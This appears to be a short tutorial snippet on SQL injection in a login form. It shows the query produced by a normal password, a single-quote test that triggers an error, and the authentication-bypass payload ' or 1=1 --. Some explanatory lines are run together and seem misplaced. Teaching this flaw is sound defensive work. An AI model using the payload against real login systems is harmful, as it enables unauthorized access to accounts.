Password:
password
Result:
SELECT *
FROM users
WHERE
email = '[email protected]'
AND pass = 'password' LIMIT 1Use this to check for vulnerability.
Password:
'
Result:
SELECT *
FROM users
WHERE
email = '[email protected]'
-- ERROR
AND pass = ''' LIMIT 1This returns a session / JWT token
Password:
' or 1=1 --Result:
SELECT *
FROM users
WHERE
email = '[email protected]'
AND pass = '' or 1=1 --' LIMIT 1